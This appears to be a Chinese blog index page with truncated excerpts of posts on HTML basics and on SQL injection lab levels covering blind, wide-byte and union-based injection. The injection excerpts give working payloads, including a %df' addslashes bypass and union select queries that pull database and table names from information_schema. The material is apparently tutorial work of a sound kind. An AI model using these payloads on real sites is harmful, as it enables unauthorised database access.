maomao 盲注rank1-2
盲注一般用于服务器没有给出sql执行后的回显,分为两类:布尔盲注(布尔很明显True跟False,也就是说它只会根据你的注入信息返回True跟False,也就没有了之前的报错信息)时间盲注(界面返回值只有一种,true 无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否正确)盲注涉及的函数:length() 函数 返回字符串的长度su
maomao 前端基础HTML — 从QQ空间看HTML架构
<!DOCTYPE HTML><html> <head> <title>QQ空间</title> </head> <body> &
maomao 前端基础HTML — 编写一个网页
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>maomao</title></head><body><div>hello world!</div><
maomao 宽字节注入rank1-3
注入条件 使用addslashes函数或是开启php的GPC,数据库设置编码为GBK,php utf-8rank1%df' order by 3 %23 得到字段数%df' union select 1,2,database() %23 得到数据库名%df' union select 1,2,group_concat(table_name) from information
maomao 显错注入rank1-4
rank11.查询字段数 ?id=1' order by 3--+2.联合查询得到当前数据库名 ?id=0' union select 1,2,database() --+3.获得数据库里的表 ?id=0' union select 1,2,group_concat(table_name) from information_schema.tab